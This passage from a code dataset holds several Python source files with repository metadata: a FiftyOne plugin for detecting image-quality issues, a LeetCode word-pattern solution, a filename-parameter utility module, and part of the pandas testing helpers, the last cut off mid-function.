compute_patch_aspect_ratio(sample, detection):\n img_width, img_height = sample.metadata.width, sample.metadata.height\n bbox_width, bbox_height = detection.bounding_box[2:]\n width, height = bbox_width * img_width, bbox_height * img_height\n return _compute_aspect_ratio(width, height)\n\n\n#### BLURRINESS ####\ndef _compute_blurriness(cv2_img):\n # pylint: disable=no-member\n gray = cv2.cvtColor(cv2_img, cv2.COLOR_BGR2GRAY)\n # pylint: disable=no-member\n laplacian = cv2.Laplacian(gray, cv2.CV_64F)\n variance = laplacian.var()\n return variance\n\n\ndef compute_sample_blurriness(sample):\n # pylint: disable=no-member\n image = cv2.imread(get_filepath(sample))\n return _compute_blurriness(image)\n\n\ndef compute_patch_blurriness(sample, detection):\n patch = _get_pillow_patch(sample, detection)\n patch = _convert_pillow_to_opencv(patch)\n return _compute_blurriness(patch)\n\n\n#### BRIGHTNESS ####\ndef _compute_brightness(pillow_img):\n pixels = np.array(pillow_img)\n if pixels.ndim == 3 and pixels.shape[-1] == 3:\n r, g, b = pixels.mean(axis=(0, 1))\n else:\n mean = pixels.mean()\n r, g, b = (\n mean,\n mean,\n mean,\n )\n\n ## equation from here:\n ## https://www.nbdtech.com/Blog/archive/2008/04/27/calculating-the-perceived-brightness-of-a-color.aspx\n ## and here:\n ## https://github.com/cleanlab/cleanvision/blob/72a1535019fe7b4636d43a9ef4e8e0060b8d66ec/src/cleanvision/issue_managers/image_property.py#L95\n brightness = (\n np.sqrt(0.241 * r**2 + 0.691 * g**2 + 0.068 * b**2) / 255\n )\n return brightness\n\n\ndef compute_sample_brightness(sample):\n image = Image.open(get_filepath(sample))\n return _compute_brightness(image)\n\n\ndef compute_patch_brightness(sample, detection):\n patch = _get_pillow_patch(sample, detection)\n return _compute_brightness(patch)\n\n\n#### CONTRAST ####\ndef _compute_contrast(cv2_image):\n # Calculate the histogram\n histogram, _ = np.histogram(cv2_image, bins=256, range=(0, 256))\n min_intensity = np.min(np.where(histogram > 0))\n max_intensity = np.max(np.where(histogram > 0))\n contrast_range = max_intensity - min_intensity\n return contrast_range\n\n\ndef compute_sample_contrast(sample):\n image = _get_opencv_grayscale_image(sample)\n return _compute_contrast(image)\n\n\ndef compute_patch_contrast(sample, detection):\n cv2_image = _get_opencv_grayscale_image(sample)\n pillow_image = _convert_opencv_to_pillow(cv2_image)\n patch = _crop_pillow_image(pillow_image, detection)\n patch = _convert_pillow_to_opencv(patch)\n return _compute_contrast(patch)\n\n\n#### ENTROPY ####\ndef _compute_entropy(pillow_img):\n return pillow_img.entropy()\n\n\ndef compute_sample_entropy(sample):\n image = Image.open(get_filepath(sample))\n return _compute_entropy(image)\n\n\ndef compute_patch_entropy(sample, detection):\n patch = _get_pillow_patch(sample, detection)\n return _compute_entropy(patch)\n\n\n#### EXPOSURE ####\ndef _compute_exposure(opencv_gray_img):\n # pylint: disable=no-member\n histogram = cv2.calcHist([opencv_gray_img], [0], None, [256], [0, 256])\n normalized_histogram = histogram.ravel() / histogram.max()\n min_exposure = normalized_histogram[0]\n max_exposure = normalized_histogram[-1]\n return min_exposure, max_exposure\n\n\ndef compute_sample_exposure(sample):\n gray_img = _get_opencv_grayscale_image(sample)\n return _compute_exposure(gray_img)\n\n\ndef compute_patch_exposure(sample, detection):\n gray_img = _get_opencv_grayscale_image(sample)\n pillow_image = _convert_opencv_to_pillow(gray_img)\n patch = _crop_pillow_image(pillow_image, detection)\n patch = _convert_pillow_to_opencv(patch)\n return _compute_exposure(patch)\n\n\n#### SALT AND PEPPER ####\ndef _compute_salt_and_pepper(opencv_gray_img):\n SALT_THRESHOLD = 244\n PEPPER_THRESHOLD = 10\n\n # Identifying salt-and-pepper pixels\n salt_pixels = opencv_gray_img >= SALT_THRESHOLD\n pepper_pixels = opencv_gray_img <= PEPPER_THRESHOLD\n\n # Morphological operations to exclude larger contiguous regions\n kernel = np.ones((2, 2), np.uint8)\n\n # Dilate and then erode (Opening operation)\n # pylint: disable=no-member\n salt_opening = cv2.morphologyEx(\n salt_pixels.astype(np.uint8), cv2.MORPH_OPEN, kernel\n ) # pylint: disable=no-member\n pepper_opening = cv2.morphologyEx(\n pepper_pixels.astype(np.uint8), cv2.MORPH_OPEN, kernel\n )\n\n # Identify isolated salt and pepper pixels\n salt_isolated = salt_pixels & ~salt_opening\n pepper_isolated = pepper_pixels & ~pepper_opening\n\n # Calculate the percentage of isolated salt-and-pepper pixels\n total_isolated_salt_pepper_pixels = np.sum(salt_isolated) + np.sum(\n pepper_isolated\n )\n total_pixels = opencv_gray_img.size\n noise_percentage = total_isolated_salt_pepper_pixels / total_pixels * 100\n\n return noise_percentage\n\n\ndef compute_sample_salt_and_pepper(sample):\n gray_img = _get_opencv_grayscale_image(sample)\n return _compute_salt_and_pepper(gray_img)\n\n\ndef compute_patch_salt_and_pepper(sample, detection):\n gray_img = _get_opencv_grayscale_image(sample)\n pillow_image = _convert_opencv_to_pillow(gray_img)\n patch = _crop_pillow_image(pillow_image, detection)\n patch = _convert_pillow_to_opencv(patch)\n return _compute_salt_and_pepper(patch)\n\n\ndef _compute_saturation(open_cv_image):\n # pylint: disable=no-member\n hsv = cv2.cvtColor(open_cv_image, cv2.COLOR_BGR2HSV)\n saturation = hsv[:, :, 1]\n return np.mean(saturation)\n\n\ndef compute_sample_saturation(sample):\n # pylint: disable=no-member\n image = cv2.imread(get_filepath(sample))\n return _compute_saturation(image)\n\n\ndef compute_patch_saturation(sample, detection):\n # pylint: disable=no-member\n opencv_image = cv2.imread(get_filepath(sample))\n pillow_image = _convert_opencv_to_pillow(opencv_image)\n patch = _crop_pillow_image(pillow_image, detection)\n patch = _convert_pillow_to_opencv(patch)\n return _compute_saturation(patch)\n\n\n#### VIGNETTING ####\ndef _compute_vignetting(opencv_gray_img):\n # Get the image center\n size_y, size_x = np.array(opencv_gray_img).shape[:2]\n center_y, center_x = size_y / 2, size_x / 2\n\n # Calculate the maximum radius\n max_radius = np.min([center_x, center_y])\n\n # Create a meshgrid for calculating distances\n y, x = np.ogrid[\n -center_y : opencv_gray_img.shape[0] - center_y,\n -center_x : opencv_gray_img.shape[1] - center_x,\n ]\n distances = np.sqrt(x**2 + y**2)\n\n # Calculate the radial intensity profile\n radial_profile = []\n for r in range(int(max_radius)):\n mask = distances < r\n if np.any(mask):\n radial_profile.append(np.mean(opencv_gray_img[mask]))\n else:\n radial_profile.append(np.nan) # Append NaN if the mask is empty\n\n radial_profile = np.array(radial_profile)\n\n # Filter out NaN values before calculating the drop-off\n radial_profile = radial_profile[~np.isnan(radial_profile)]\n\n # Analyze the profile for a drop-off, if there are any values\n if len(radial_profile) > 0:\n drop_off_percentage = (\n (radial_profile[0] - radial_profile[-1]) / radial_profile[0] * 100\n )\n else:\n drop_off_percentage = np.nan\n\n return drop_off_percentage\n\n\ndef compute_sample_vignetting(sample):\n # pylint: disable=no-member\n image = cv2.imread(get_filepath(sample), cv2.IMREAD_GRAYSCALE)\n return _compute_vignetting(image)\n\n\ndef compute_patch_vignetting(sample, detection):\n # pylint: disable=no-member\n gray_image = cv2.imread(get_filepath(sample), cv2.IMREAD_GRAYSCALE)\n pillow_image = _convert_opencv_to_pillow(gray_image)\n patch = _crop_pillow_image(pillow_image, detection)\n patch = _convert_pillow_to_opencv(patch)\n return _compute_vignetting(patch)\n\n\n################################################################\n################################################################\n\nPROP_SAMPLE_COMPUTE_FUNCTIONS = {\n \"aspect_ratio\": compute_sample_aspect_ratio,\n \"blurriness\": compute_sample_blurriness,\n \"brightness\": compute_sample_brightness,\n \"contrast\": compute_sample_contrast,\n \"entropy\": compute_sample_entropy,\n \"exposure\": compute_sample_exposure,\n \"salt_and_pepper\": compute_sample_salt_and_pepper,\n \"saturation\": compute_sample_saturation,\n \"vignetting\": compute_sample_vignetting,\n}\n\n\nPROP_PATCH_COMPUTE_FUNCTIONS = {\n \"aspect_ratio\": compute_patch_aspect_ratio,\n \"blurriness\": compute_patch_blurriness,\n \"brightness\": compute_patch_brightness,\n \"contrast\": compute_patch_contrast,\n \"entropy\": compute_patch_entropy,\n \"exposure\": compute_patch_exposure,\n \"salt_and_pepper\": compute_patch_salt_and_pepper,\n \"saturation\": compute_patch_saturation,\n \"vignetting\": compute_patch_vignetting,\n}\n\n\ndef compute_dataset_property(property, dataset, view=None, patches_field=None):\n if view is None:\n view = dataset\n if patches_field is None:\n dataset.add_sample_field(property, fo.FloatField)\n for sample in view.iter_samples(autosave=True, progress=True):\n prop_value = PROP_SAMPLE_COMPUTE_FUNCTIONS[property](sample)\n if property == \"exposure\":\n sample[\"min_exposure\"] = prop_value[0]\n sample[\"max_exposure\"] = prop_value[1]\n else:\n sample[property] = prop_value\n else:\n for sample in view.iter_samples(autosave=True, progress=True):\n if sample[patches_field] is None:\n continue\n for detection in sample[patches_field].detections:\n prop_value = PROP_PATCH_COMPUTE_FUNCTIONS[property](\n sample, detection\n )\n if property == \"exposure\":\n detection[\"min_exposure\"] = prop_value[0]\n detection[\"max_exposure\"] = prop_value[1]\n else:\n detection[property] = prop_value\n dataset.add_dynamic_sample_fields()\n\n\n################################################################\n################################################################\n\n\n##### UNIFIED INTERFACE #####\ndef _handle_config(property_name):\n _config = foo.OperatorConfig(\n name=f\"compute_{property_name}\",\n label=f\"Common Issues: compute {property_name.replace('_', ' ')}\",\n dynamic=True,\n )\n _config.icon = \"/assets/icon.svg\"\n return _config\n\n\ndef _handle_inputs(ctx, property_name):\n inputs = types.Object()\n label = \"compute \" + property_name.replace(\"_\", \" \")\n inputs.message(label, label=label)\n _execution_mode(ctx, inputs)\n _list_target_views(ctx, inputs)\n _handle_patch_inputs(ctx, inputs)\n return types.Property(inputs)\n\n\ndef _handle_execution(ctx, property_name):\n view = _get_target_view(ctx, ctx.params[\"target\"])\n patches_field = ctx.params.get(\"patches_field\", None)\n compute_dataset_property(\n property_name, ctx.dataset, view=view, patches_field=patches_field\n )\n ctx.trigger(\"reload_dataset\")\n\n\ndef _handle_calling(\n uri, sample_collection, patches_field=None, delegate=False\n):\n ctx = dict(view=sample_collection.view())\n params = dict(\n target=\"CURRENT_VIEW\",\n patches_field=patches_field,\n delegate=delegate,\n )\n return foo.execute_operator(uri, ctx, params=params)\n\n\nclass ComputeAspectRatio(foo.Operator):\n @property\n def config(self):\n return _handle_config(\"aspect_ratio\")\n\n def resolve_delegation(self, ctx):\n return ctx.params.get(\"delegate\", False)\n\n def resolve_input(self, ctx):\n return _handle_inputs(ctx, \"aspect_ratio\")\n\n def execute(self, ctx):\n _handle_execution(ctx, \"aspect_ratio\")\n\n def __call__(self, sample_collection, patches_field=None, delegate=False):\n return _handle_calling(\n self.uri,\n sample_collection,\n patches_field=patches_field,\n delegate=delegate,\n )\n\n\nclass ComputeBlurriness(foo.Operator):\n @property\n def config(self):\n return _handle_config(\"blurriness\")\n\n def resolve_delegation(self, ctx):\n return ctx.params.get(\"delegate\", False)\n\n def resolve_input(self, ctx):\n return _handle_inputs(ctx, \"blurriness\")\n\n def execute(self, ctx):\n _handle_execution(ctx, \"blurriness\")\n\n def __call__(self, sample_collection, patches_field=None, delegate=False):\n return _handle_calling(\n self.uri,\n sample_collection,\n patches_field=patches_field,\n delegate=delegate,\n )\n\n\nclass ComputeBrightness(foo.Operator):\n @property\n def config(self):\n return _handle_config(\"brightness\")\n\n def resolve_delegation(self, ctx):\n return ctx.params.get(\"delegate\", False)\n\n def resolve_input(self, ctx):\n return _handle_inputs(ctx, \"brightness\")\n\n def execute(self, ctx):\n _handle_execution(ctx, \"brightness\")\n\n def __call__(self, sample_collection, patches_field=None, delegate=False):\n return _handle_calling(\n self.uri,\n sample_collection,\n patches_field=patches_field,\n delegate=delegate,\n )\n\n\nclass ComputeContrast(foo.Operator):\n @property\n def config(self):\n return _handle_config(\"contrast\")\n\n def resolve_delegation(self, ctx):\n return ctx.params.get(\"delegate\", False)\n\n def resolve_input(self, ctx):\n return _handle_inputs(ctx, \"contrast\")\n\n def execute(self, ctx):\n _handle_execution(ctx, \"contrast\")\n\n def __call__(self, sample_collection, patches_field=None, delegate=False):\n return _handle_calling(\n self.uri,\n sample_collection,\n patches_field=patches_field,\n delegate=delegate,\n )\n\n\nclass ComputeEntropy(foo.Operator):\n @property\n def config(self):\n return _handle_config(\"entropy\")\n\n def resolve_delegation(self, ctx):\n return ctx.params.get(\"delegate\", False)\n\n def resolve_input(self, ctx):\n return _handle_inputs(ctx, \"entropy\")\n\n def execute(self, ctx):\n _handle_execution(ctx, \"entropy\")\n\n def __call__(self, sample_collection, patches_field=None, delegate=False):\n return _handle_calling(\n self.uri,\n sample_collection,\n patches_field=patches_field,\n delegate=delegate,\n )\n\n\nclass ComputeExposure(foo.Operator):\n @property\n def config(self):\n return _handle_config(\"exposure\")\n\n def resolve_delegation(self, ctx):\n return ctx.params.get(\"delegate\", False)\n\n def resolve_input(self, ctx):\n return _handle_inputs(ctx, \"exposure\")\n\n def execute(self, ctx):\n _handle_execution(ctx, \"exposure\")\n\n def __call__(self, sample_collection, patches_field=None, delegate=False):\n return _handle_calling(\n self.uri,\n sample_collection,\n patches_field=patches_field,\n delegate=delegate,\n )\n\n\nclass ComputeSaltAndPepper(foo.Operator):\n @property\n def config(self):\n return _handle_config(\"salt_and_pepper\")\n\n def resolve_delegation(self, ctx):\n return ctx.params.get(\"delegate\", False)\n\n def resolve_input(self, ctx):\n return _handle_inputs(ctx, \"salt_and_pepper\")\n\n def execute(self, ctx):\n _handle_execution(ctx, \"salt_and_pepper\")\n\n def __call__(self, sample_collection, patches_field=None, delegate=False):\n return _handle_calling(\n self.uri,\n sample_collection,\n patches_field=patches_field,\n delegate=delegate,\n )\n\n\nclass ComputeSaturation(foo.Operator):\n @property\n def config(self):\n return _handle_config(\"saturation\")\n\n def resolve_delegation(self, ctx):\n return ctx.params.get(\"delegate\", False)\n\n def resolve_input(self, ctx):\n return _handle_inputs(ctx, \"saturation\")\n\n def execute(self, ctx):\n _handle_execution(ctx, \"saturation\")\n\n def __call__(self, sample_collection, patches_field=None, delegate=False):\n return _handle_calling(\n self.uri,\n sample_collection,\n patches_field=patches_field,\n delegate=delegate,\n )\n\n\nclass ComputeVignetting(foo.Operator):\n @property\n def config(self):\n return _handle_config(\"vignetting\")\n\n def resolve_delegation(self, ctx):\n return ctx.params.get(\"delegate\", False)\n\n def resolve_input(self, ctx):\n return _handle_inputs(ctx, \"vignetting\")\n\n def execute(self, ctx):\n _handle_execution(ctx, \"vignetting\")\n\n def __call__(self, sample_collection, patches_field=None, delegate=False):\n return _handle_calling(\n self.uri,\n sample_collection,\n patches_field=patches_field,\n delegate=delegate,\n )\n\n\ndef _need_to_compute(dataset, field_name, patches_field=None):\n if patches_field is not None:\n i = 0\n sample = dataset.skip(i).first()\n while (\n \"detections\" not in sample[patches_field]\n or len(sample[patches_field].detections) == 0\n ):\n i += 1\n sample = dataset.skip(i).first()\n detection = sample[patches_field].detections[0]\n if field_name not in detection:\n return True\n else:\n return False\n else:\n if field_name in list(dataset.get_field_schema().keys()):\n return False\n else:\n return field_name not in dataset.first()\n\n\ndef _run_computation(dataset, issue_name, patches_field=None):\n compute_dataset_property(issue_name, dataset, patches_field=patches_field)\n\n\n######## ISSUE FUNCTIONS ########\n\nISSUE_MAPPING = {\n \"bright\": {\n \"label\": \"Bright\",\n \"base_property\": \"brightness\",\n \"threshold\": 0.55,\n \"lt\": False,\n \"description\": \"Find bright images in the dataset\",\n },\n \"dark\": {\n \"label\": \"Dark\",\n \"base_property\": \"brightness\",\n \"threshold\": 0.1,\n \"lt\": True,\n \"description\": \"Find dark images in the dataset\",\n },\n \"weird_aspect_ratio\": {\n \"label\": \"Weird Aspect Ratio\",\n \"base_property\": \"aspect_ratio\",\n \"threshold\": 0.5,\n \"lt\": True,\n \"description\": \"Find weird aspect ratio images in the dataset\",\n },\n \"blurry\": {\n \"label\": \"Blurry\",\n \"base_property\": \"blurriness\",\n \"threshold\": 100.0,\n \"lt\": True,\n \"description\": \"Find blurry images in the dataset\",\n },\n \"low_entropy\": {\n \"label\": \"Low Entropy\",\n \"base_property\": \"entropy\",\n \"threshold\": 5.0,\n \"lt\": True,\n \"description\": \"Find low entropy images in the dataset\",\n },\n \"low_exposure\": {\n \"label\": \"Low Exposure\",\n \"base_property\": \"min_exposure\",\n \"threshold\": 0.1,\n \"lt\": True,\n \"description\": \"Find low exposure images in the dataset\",\n },\n \"high_exposure\": {\n \"label\": \"High Exposure\",\n \"base_property\": \"max_exposure\",\n \"threshold\": 0.7,\n \"lt\": False,\n \"description\": \"Find high exposure images in the dataset\",\n },\n \"low_contrast\": {\n \"label\": \"Low Contrast\",\n \"base_property\": \"contrast\",\n \"threshold\": 50.0,\n \"lt\": True,\n \"description\": \"Find low contrast images in the dataset\",\n },\n \"high_contrast\": {\n \"label\": \"High Contrast\",\n \"base_property\": \"contrast\",\n \"threshold\": 200.0,\n \"lt\": False,\n \"description\": \"Find high contrast images in the dataset\",\n },\n \"low_saturation\": {\n \"label\": \"Low Saturation\",\n \"base_property\": \"saturation\",\n \"threshold\": 40.0,\n \"lt\": True,\n \"description\": \"Find low saturation images in the dataset\",\n },\n \"high_saturation\": {\n \"label\": \"High Saturation\",\n \"base_property\": \"saturation\",\n \"threshold\": 200.0,\n \"lt\": False,\n \"description\": \"Find high saturation images in the dataset\",\n },\n}\n\n\ndef find_issue_images(\n dataset,\n threshold,\n field_name,\n issue_name,\n lt=True,\n patches_field=None,\n view=None,\n):\n if _need_to_compute(dataset, field_name, patches_field=patches_field):\n _run_computation(dataset, field_name, patches_field=patches_field)\n\n if view is None:\n view = dataset\n\n if patches_field is None:\n dataset.add_sample_field(issue_name, fo.BooleanField)\n\n if lt:\n view = view.set_field(issue_name, F(field_name) < threshold)\n else:\n view = view.set_field(issue_name, F(field_name) > threshold)\n view.save()\n view = view.match(F(issue_name))\n view.tag_samples(issue_name)\n view.tag_samples(\"issue\")\n view.save()\n else:\n embedded_field_name = f\"{patches_field}.detections.{field_name}\"\n embedded_issue_name = f\"{patches_field}.detections.{issue_name}\"\n if lt:\n values = view.values(F(embedded_field_name) < threshold)\n else:\n values = view.values(F(embedded_field_name) > threshold)\n view.set_values(embedded_issue_name, values, dynamic=True)\n view = view.filter_labels(patches_field, filter=F(issue_name) == True)\n view.tag_labels(issue_name, label_fields=patches_field)\n view.tag_labels(\"issue\", label_fields=patches_field)\n dataset.add_dynamic_sample_fields()\n\n\ndef _find_issue_type_images(\n dataset, issue_type, threshold=None, patches_field=None, view=None\n):\n issue = ISSUE_MAPPING[issue_type]\n if threshold is None:\n threshold = issue[\"threshold\"]\n find_issue_images(\n dataset,\n threshold,\n issue[\"base_property\"],\n issue_type,\n lt=issue[\"lt\"],\n patches_field=patches_field,\n view=view,\n )\n\n\ndef _single_or_multi_mode(inputs):\n mode = types.RadioGroup()\n mode.add_choice(\n \"SINGLE\",\n label=\"SINGLE\",\n description=\"Find a single type of issue\",\n )\n mode.add_choice(\n \"MULTI\",\n label=\"MULTI\",\n description=\"Find multiple types of issues\",\n )\n inputs.enum(\n \"issue_mode\",\n mode.values(),\n default=\"SINGLE\",\n description=\"Find a single type of issue or multiple types of issues\",\n view=types.TabsView(),\n )\n\n\nclass FindIssues(foo.Operator):\n @property\n def config(self):\n _config = foo.OperatorConfig(\n name=\"find_issues\",\n label=\"Common Issues: find issues\",\n dynamic=True,\n )\n _config.icon = \"/assets/icon.svg\"\n return _config\n\n def resolve_input(self, ctx):\n inputs = types.Object()\n form_view = types.View(label=\"Find Common Issues\")\n if ctx.dataset.media_type != \"image\":\n warning = types.Warning(\n label=\"This operator is only available for image datasets!\"\n )\n inputs.view(\"warning\", warning)\n return types.Property(inputs)\n\n threshold_view = types.TextFieldView(\n componentsProps={\n \"textField\": {\n \"step\": \"0.01\",\n \"inputMode\": \"numeric\",\n \"pattern\": \"[0-9]*\",\n },\n }\n )\n\n _single_or_multi_mode(inputs)\n\n mode = ctx.params.get(\"issue_mode\", \"SINGLE\")\n _list_target_views(ctx, inputs)\n _handle_patch_inputs(ctx, inputs)\n\n if mode == \"SINGLE\":\n issue_choices = types.Dropdown(multiple=False)\n for issue in ISSUE_MAPPING:\n issue_choices.add_choice(\n issue,\n label=ISSUE_MAPPING[issue][\"label\"],\n description=ISSUE_MAPPING[issue][\"description\"],\n )\n inputs.enum(\n \"issue\",\n issue_choices.values(),\n required=True,\n label=\"Issue Type\",\n view=issue_choices,\n )\n\n for issue in ISSUE_MAPPING:\n if ctx.params.get(\"issue\", False) == issue:\n inputs.float(\n issue + \"_threshold\",\n default=ISSUE_MAPPING[issue][\"threshold\"],\n label=ISSUE_MAPPING[issue][\"description\"],\n view=threshold_view,\n )\n else:\n for issue in ISSUE_MAPPING:\n inputs.bool(\n issue,\n default=True,\n label=ISSUE_MAPPING[issue][\"label\"],\n view=types.CheckboxView(),\n )\n\n if ctx.params.get(issue, False) == True:\n inputs.float(\n issue + \"_threshold\",\n default=ISSUE_MAPPING[issue][\"threshold\"],\n label=ISSUE_MAPPING[issue][\"description\"],\n view=threshold_view,\n )\n\n return types.Property(inputs, view=form_view)\n\n def execute(self, ctx):\n single_mode = ctx.params.get(\"issue_mode\", \"SINGLE\")\n view = _get_target_view(ctx, ctx.params[\"target\"])\n patches_field = ctx.params.get(\"patches_field\", None)\n\n for issue in ISSUE_MAPPING.keys():\n if (\n ctx.params.get(issue, False) == True\n and single_mode == \"MULTI\"\n or ctx.params.get(\"issue\", False) == issue\n and single_mode == \"SINGLE\"\n ):\n threshold_key = ISSUE_MAPPING[issue][\"threshold\"]\n threshold = ctx.params.get(threshold_key, None)\n _find_issue_type_images(\n ctx.dataset,\n issue,\n threshold=threshold,\n patches_field=patches_field,\n view=view,\n )\n\n ctx.trigger(\"reload_dataset\")\n\n\ndef register(plugin):\n plugin.register(ComputeAspectRatio)\n plugin.register(ComputeBlurriness)\n plugin.register(ComputeBrightness)\n plugin.register(ComputeContrast)\n plugin.register(ComputeEntropy)\n plugin.register(ComputeExposure)\n plugin.register(ComputeSaltAndPepper)\n plugin.register(ComputeSaturation)\n plugin.register(ComputeVignetting)\n plugin.register(FindIssues)\n","repo_name":"jacobmarks/image-quality-issues","sub_path":"__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":31516,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"3"}
+{"seq_id":"9716229458","text":"class Solution:\n def wordPattern(self, p: str, s: str) -> bool:\n words= s.split(' ')\n mp={}\n if len(p)!=len(words):return False\n if len(set(p)) != len(set(words)): return False # for the case w = ['dog', 'cat'] and p = 'aa'\n\n for i in range(len(words)):\n if words[i] not in mp: \n mp[words[i]] = p[i]\n elif mp[words[i]] != p[i]: \n return False\n\n return True","repo_name":"janvi2002/Leetcode","sub_path":"0290-word-pattern/0290-word-pattern.py","file_name":"0290-word-pattern.py","file_ext":"py","file_size_in_byte":453,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"25938220656","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Apr 3 15:06:16 2020\n\n@author: henric\n\"\"\"\n\ndef dict_to_str(params, key_sep='-', value_sep=':'):\n if len(params)==0:\n return ''\n return key_sep.join(sorted(['{}{}{}'.format(k,value_sep, v) for k,v in params.items()]))\n\ndef str_to_dict(params_str, key_sep='-', value_sep=':'):\n if not params_str:\n return {}\n splitted = params_str.split('-')\n splitted = [dict_formatting(s, value_sep) for s in splitted]\n return eval('{{{}}}'.format(','.join(splitted)))\n\ndef dict_formatting(s, value_sep=':'):\n k,v = s.split(value_sep)\n try:\n eval(v)\n except:\n v = '\"{}\"'.format(v)\n return value_sep.join(['\"{}\"'.format(k), v])\n\ndef give_filename(filename_rad, prefix='', params={}, extension='ply', sep='_'):\n filename = sep.join(filter(None, [prefix, filename_rad, dict_to_str(params)]))\n return '{}.{}'.format(filename, extension)\n\ndef parse_filename(filename, sep='_', key_sep='-', value_sep=':'):\n filename = '.'.join(filename.split('.')[:-1])\n parts = filename.split(sep)\n \n prefix, filename_rad, params_str = '', '', ''\n \n if len(parts)==1:\n filename_rad = parts[0]\n elif len(parts)==3:\n prefix, filename_rad, params_str = parts\n elif len(parts)==2:\n if value_sep in parts[-1]:\n params_str = parts[-1]\n filename_rad = parts[0]\n else:\n prefix, filename_rad = parts\n else:\n raise ValueError('wrong format')\n \n params = str_to_dict(params_str, key_sep, value_sep)\n return prefix, filename_rad, params\n \n \n ","repo_name":"VincentHenric/IASD_3D","sub_path":"project/code/fileutils.py","file_name":"fileutils.py","file_ext":"py","file_size_in_byte":1643,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"19238692342","text":"from __future__ import division\n\n# pylint: disable-msg=W0402\n\nfrom datetime import datetime\nimport random\nimport string\nimport sys\nimport tempfile\n\nfrom contextlib import contextmanager # contextlib is available since 2.5\n\nfrom distutils.version import LooseVersion\n\nfrom numpy.random import randn\nimport numpy as np\n\nfrom pandas.core.common import isnull, _is_sequence\nimport pandas.core.index as index\nimport pandas.core.series as series\nimport pandas.core.frame as frame\nimport pandas.core.panel as panel\nimport pandas.core.panel4d as panel4d\n\nfrom pandas import bdate_range\nfrom pandas.tseries.index import DatetimeIndex\nfrom pandas.tseries.period import PeriodIndex\n\nIndex = index.Index\nMultiIndex = index.MultiIndex\nSeries = series.Series\nDataFrame = frame.DataFrame\nPanel = panel.Panel\nPanel4D = panel4d.Panel4D\n\nN = 30\nK = 4\n\n\ndef rands(n):\n choices = string.ascii_letters + string.digits\n return ''.join([random.choice(choices) for _ in xrange(n)])\n\n\ndef randu(n):\n choices = u\"\".join(map(unichr, range(1488, 1488 + 26))) + string.digits\n return ''.join([random.choice(choices) for _ in xrange(n)])\n\n#------------------------------------------------------------------------------\n# Console debugging tools\n\n\ndef debug(f, *args, **kwargs):\n from pdb import Pdb as OldPdb\n try:\n from IPython.core.debugger import Pdb\n kw = dict(color_scheme='Linux')\n except ImportError:\n Pdb = OldPdb\n kw = {}\n pdb = Pdb(**kw)\n return pdb.runcall(f, *args, **kwargs)\n\n\ndef pudebug(f, *args, **kwargs):\n import pudb\n return pudb.runcall(f, *args, **kwargs)\n\n\ndef set_trace():\n from IPython.core.debugger import Pdb\n try:\n Pdb(color_scheme='Linux').set_trace(sys._getframe().f_back)\n except:\n from pdb import Pdb as OldPdb\n OldPdb().set_trace(sys._getframe().f_back)\n\n#------------------------------------------------------------------------------\n# contextmanager to ensure the file cleanup\nfrom contextlib import contextmanager\n@contextmanager\ndef ensure_clean(filename = None):\n # if we are not passed a filename, generate a temporary\n if filename is None:\n filename = tempfile.mkstemp()[1]\n\n try:\n yield filename\n finally:\n import os\n try:\n os.remove(filename)\n except:\n pass\n\ndef get_data_path(f = None):\n \"\"\" return the path of a data file, these are relative to the current test dir \"\"\"\n\n if f is None:\n f = ''\n import inspect, os\n\n # get our callers file\n frame,filename,line_number,function_name,lines,index = \\\n inspect.getouterframes(inspect.currentframe())[1]\n\n base_dir = os.path.abspath(os.path.dirname(filename))\n return os.path.join(base_dir, 'data/%s' % f)\n\n#------------------------------------------------------------------------------\n# Comparators\n\n\ndef equalContents(arr1, arr2):\n \"\"\"Checks if the set of unique elements of arr1 and arr2 are equivalent.\n \"\"\"\n return frozenset(arr1) == frozenset(arr2)\n\n\ndef isiterable(obj):\n return hasattr(obj, '__iter__')\n\n\ndef assert_almost_equal(a, b, check_less_precise = False):\n if isinstance(a, dict) or isinstance(b, dict):\n return assert_dict_equal(a, b)\n\n if isinstance(a, basestring):\n assert a == b, (a, b)\n return True\n\n if isiterable(a):\n np.testing.assert_(isiterable(b))\n assert(len(a) == len(b))\n if np.array_equal(a, b):\n return True\n else:\n for i in xrange(len(a)):\n assert_almost_equal(a[i], b[i], check_less_precise)\n return True\n\n err_msg = lambda a, b: 'expected %.5f but got %.5f' % (a, b)\n\n if isnull(a):\n np.testing.assert_(isnull(b))\n return\n\n if isinstance(a, (bool, float, int, np.float32)):\n decimal = 5\n\n # deal with differing dtypes\n if check_less_precise:\n dtype_a = np.dtype(type(a))\n dtype_b = np.dtype(type(b))\n if dtype_a.kind == 'i' and dtype_b == 'i':\n pass\n if dtype_a.kind == 'f' and dtype_b == 'f':\n if dtype_a.itemsize <= 4 and dtype_b.itemsize <= 4:\n decimal = 3\n\n if np.isinf(a):\n assert np.isinf(b), err_msg(a, b)\n\n # case for zero\n elif abs(a) < 1e-5:\n np.testing.assert_almost_equal(\n a, b, decimal=decimal, err_msg=err_msg(a, b), verbose=False)\n else:\n np.testing.assert_almost_equal(\n 1, a / b, decimal=decimal, err_msg=err_msg(a, b), verbose=False)\n else:\n assert(a == b)\n\n\ndef is_sorted(seq):\n return assert_almost_equal(seq, np.sort(np.array(seq)))\n\n\ndef assert_dict_equal(a, b, compare_keys=True):\n a_keys = frozenset(a.keys())\n b_keys = frozenset(b.keys())\n\n if compare_keys:\n assert(a_keys == b_keys)\n\n for k in a_keys:\n assert_almost_equal(a[k], b[k])\n\n\ndef assert_series_equal(left, right, check_dtype=True,\n check_index_type=False,\n check_index_freq=False,\n check_series_type=False,\n check_less_precise=False):\n if check_series_type:\n assert(type(left) == type(right))\n assert_almost_equal(left.values, right.values, check_less_precise)\n if check_dtype:\n assert(left.dtype == right.dtype)\n if check_less_precise:\n assert_almost_equal(left.index.values, right.index.values, check_less_precise)\n else:\n assert(left.index.equals(right.index))\n if check_index_type:\n assert(type(left.index) == type(right.index))\n assert(left.index.dtype == right.index.dtype)\n assert(left.index.inferred_type == right.index.inferred_type)\n if check_index_freq:\n assert(getattr(left, 'freqstr', None) ==\n getattr(right, 'freqstr', None))\n\n\ndef assert_frame_equal(left, 